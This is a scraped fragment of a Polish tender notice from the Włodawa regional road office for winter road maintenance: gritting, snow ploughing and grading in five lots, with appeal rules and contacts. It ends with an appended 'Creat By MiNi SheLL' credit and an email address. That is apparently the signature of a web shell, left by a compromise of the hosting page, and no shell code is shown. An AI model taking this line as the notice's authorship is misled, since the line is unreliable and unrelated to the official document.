        tel.:   82 57 21 952, faks:  82 57 21 793, e-mail rdw.wlodawa@zdw.lublin.pl
   2) w sprawach formalno - prawnych związanych z postępowaniem o udzielenie 
       zamówienia i zawarciem umowy: Barbara Winiarczyk, Eugeniusz Kiewczykowski 
       pok. Nr 2 w godz. 7 - 15, tel.: 82 57 21 635,  faks:  82 57 21 793

UWAGA:
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji 
faksem na nr 82 572 17 93 lub pocztą elektroniczną na adres: rdw.wlodawa@zdw.lublin.pl  zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). 
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach, i zmianach dotyczących specyfikacji istotnych warunków zamówienia, protestach dotyczących SIWZ i rozstrzygnięciach tych protestów, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert.
POUCZENIE O ŚRODKACH  OCHRONY PRAWNEJ 

1.  Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności
     zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
     czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
2.  Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
     (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.
3.  Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
     której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
     zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
     uzasadniające wniesienie odwołania. 
4. Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
     bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego 
     kwalifikowanego certyfikatu.
5. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
    wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesieni, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych w art. 27 ust. 2 ustawy.
6. Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o  czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
7. Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 
    5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
8. Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
9. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenie o udzieleniu zamówienia.
10. Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - solarka - szt. 6 (nośnik i solarka własność Wykonawcy, pług lemieszowy 
           jednostronny użyczony z RDW)
      Maksymalna ilość usług:
a)	zwalczanie śliskości , zwalczanie śliskości + odśnieżanie   - 380 godz./szt.
b)	odśnieżanie			                                               - 130 godz./szt.
c)	dyżur                                                                                     -   25 godz./szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.63.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZXadanie Nr II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - piaskarka - szt. 2 (nośnik własność Wykonawcy, piaskarka i pług lemieszowy
  użyczone  z RDW)
Maksymalna ilość usług:
a)  zwalczanie śliskości, zwalczanie śliskości + odśnieżanie  - 300 godz./szt.
b)  odśnieżanie                                                                         - 100 godz./szt.
c)  dyżur                                                                                   -   25 godz./szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zdanie Nr III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - pług odśnieżny średni - szt. 2 (nośnik własność Wykonawcy, pług lemieszowy użyczony z RDW).
Maksymalna ilość usług:
a)	odśnieżanie - 120 godz./szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - pług odśnieżny ciężki - szt. 1 (nośnik i pług własność Wykonawcy)
Maksymalna ilość usług:
a)	odśnieżanie - 100 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - równiarka - szt. 2 (równiarka własność Wykonawcy)
Maksymalna ilość usług:
a)	odśnieżanie - 100 godz./szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com